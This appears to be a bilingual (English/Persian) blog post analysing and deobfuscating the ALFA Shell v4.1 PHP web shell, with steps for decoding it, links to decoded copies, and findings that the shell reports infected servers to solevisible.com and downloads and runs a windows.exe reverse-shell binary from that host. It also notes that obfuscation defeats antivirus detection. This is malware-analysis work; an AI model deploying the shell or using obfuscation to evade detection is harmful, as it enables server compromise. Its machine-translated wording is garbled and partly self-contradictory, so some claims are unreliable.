Deobfuscation and ALFA Shell v4.1

What is a web?

The web is a shell-based interface (in the operating system means the connection between the user and the operating system) that enables remote access and control of the web server. This way hackers can access your files using a malicious web browser. Web pages can be written in a variety of programming languages.

In other words, WebShell is a malicious script that is often used by an attacker to spread or maintain constant access to a Web system. A Web site by itself cannot attack or exploit a remote vulnerability, so it is always the second stage of the attack.

Obfuscation ( Obfuscation ) What?

Obfuscation in the field of software development refers to the process of modifying the code of an application in a way that is difficult for humans or machines to examine and understand (such as antivirus). They often use ambiguity techniques to hide the purpose and logic behind the code or the values ​​contained in it, thus reducing the likelihood of interference and reverse engineering, or turning it into a puzzle and hobby for people who want to learn.

Blurring can be done manually or with the help of special tools called obfuscators. Some of the ambiguity techniques are as follows:

  • Naming variables and functions as misleading or meaningless
  • Use deceptive comments
  • Coding of strings
  • Delete or add spaces
  • Ambiguity in Control Flow
  • Add irrelevant code and write code with an unusual shape and appearance

Deobfuscation Alfa Shell tool code

Alfa Shell is one of the most widely used websites attributed to Iranian experts.  There are about four major versions of this webpage, and I have reviewed the Deobfuscation method for the previous three versions in the past.  Here I am going to review version 4.1 (the latest version of Alfa Shell).

برای شروع ابتدا باید سورس مبهم‌سازی شده الفا را دریافت کنیم.

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/Decode%20Of%20ALFA%20Team/alfav4.1-tesla.php

سپس باید کد مربوطه را در یک فایل با نام دیگر ذخیره کنیم که در اینجا با نام alfav4.1-tesla_encode_1.php ذخیره کردیم.

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/alfav4.1-tesla_encode_1.php

در گام بعدی مقدار متغیر $WMKVyvv=’e’.’v’.’a’.’l’ را به $WMKVyvv=’echo’; تغییر می‌دهیم. و سپس این دستور را در ترمینال لینوکس اجرا می کنیم:

php alfav4.1-tesla_encode_1.php > alfav4_decode.php

محتوای دیکد شده در فایل جدید  alfav4_decode.php  ذخیره می شود:

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/alfav4_decode.php#L145&L181

متنی زیر را در ابتدای این فایل مشاهده می‌کنید:

/* You’re killing me again 🎧 Am I still in your head ? 🎧 You used to light me up 🎧 Now you shut me down — Solevisible */

این متن از موزیک Archive – Again  می باشد:

www.youtube.com/watch?v=r7rF2EZ0A_0

نکته بعدی این که یک شرط به شرح زیر در کد وجود دارد:

if(!isset($_SERVER[“HTTP_HOST”]))exit

According to this condition, the execution of Inobchell must be done through a web server, otherwise it will be exited from the program.  We comment on this line of code to continue the work.

Following the path, by adding the base64decode code, we will be able to continue the Deobfuscation of the ALFA Shell code.  The path of the added code is as follows:

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/alfav4_decode.php#L66&L70

Then run the following command again in the Linux terminal:

php alfav4_decode.php > final_decode.php

Now we see that the output of the broken ambiguous code was saved in the final_decode.php file.  This file can be downloaded from the following link:

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/final_decode.php

مقایسه نسخه‌ی Decode‌ شده‌ی ما با نسخه‌ی Decode شده‌ی Alpha

The following file is a decoded version of what the Alpha team provided with its encoded version.  Here we are going to compare our decoded output with the decoded version of Alpha to see what the differences are:

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/Decode%20Of%20ALFA%20Team/alfa-shell-v4.1-tesla-decoded.php

For this purpose, we uploaded the two mentioned files for comparison on the following site, which, based on the obtained result, are no different from each other.  So we conclude that the decoding process is well underway.

https://www.diffchecker.com/MT1BKXXj

بررسی استاتیک static

One of the most common methods used by hackers to steal access from other non-professional hackers is to generate and spread malware that, if used, acts as a backdoor for malware-causing attackers.  Accordingly, we intend to continue to review and analyze this website to see if it acts as a back door for its manufacturers (Alpha team) or not?

In this step, we checked whether this webmail, if installed, tries to communicate with a specific address or not.  For example, it is common for infected websites to send their URLs to their manufacturers after installation.  Examining the codes related to this section, no suspicious case was observed.

It was observed that WebShell sends an HTTP request to http://solevisible.com after installation.  As a result, if you upload this web site somewhere, a request will be sent to this address and the IP‌ address of the infected server will be registered on the solevisible.com web server.  An example of an Apache log structure is shown in the following figure:

بررسی کدهای Python و Perl

According to the review, part of this webcall calls obfuscate code in Python and Perl languages.  This section of WebShell is responsible for creating Reverse Shells on Linux servers.  As a result, I also Deobfuscate these codes to see if there is anything suspicious or malicious in them. You can get these codes from the following addresses:

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/obfuscation_perl.pl

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/obfuscation_python.py

I thoroughly reviewed both of these sections and finally found no suspicious items in this section of the web.

فایل باینری windows.exe

This binary file is automatically downloaded and executed from http://solevisible.com/bc/windows.exe if you need to get a NC as a Reverse Shell.  We also checked this file with GHIDRA and found no suspicious items.  The interesting thing about this file is that it is known as malware by some antiviruses and if you use it, it will be detected by antivirus web server.

بررسی شناسایی وب‌شل نسخه‌یDeobfuscate  شده با نسخه‌ی Obfuscate

As you can see in the figure below, our Deobfuscate version is detected by some antivirus as malware.

مطابق تصویر زیر، نسخه‌ی obfuscate شده توسط هیچ‌کدام از آنتی‌ویروس‌ها شناسایی نشد.

در تصویر زیر نیز نتیجه‌ی تحلیل نسخه‌ی بدونobfuscate  که توسط خود تیم آلفا ارایه شده است را مشاهده می‌کنید.

Investigations revealed no malicious activity from this web server, but the address of the server on which you installed the web server will be sent to the alpha team server.  Therefore, in your penetration testing activities or your red team, do not use ready-made tools as much as possible, or at least check them carefully before use.  We also saw that slightly modifying or obfuscating the code of a malware would have a significant effect on how antivirus responds to that malicious file or code.

1 Comment

Comments are closed.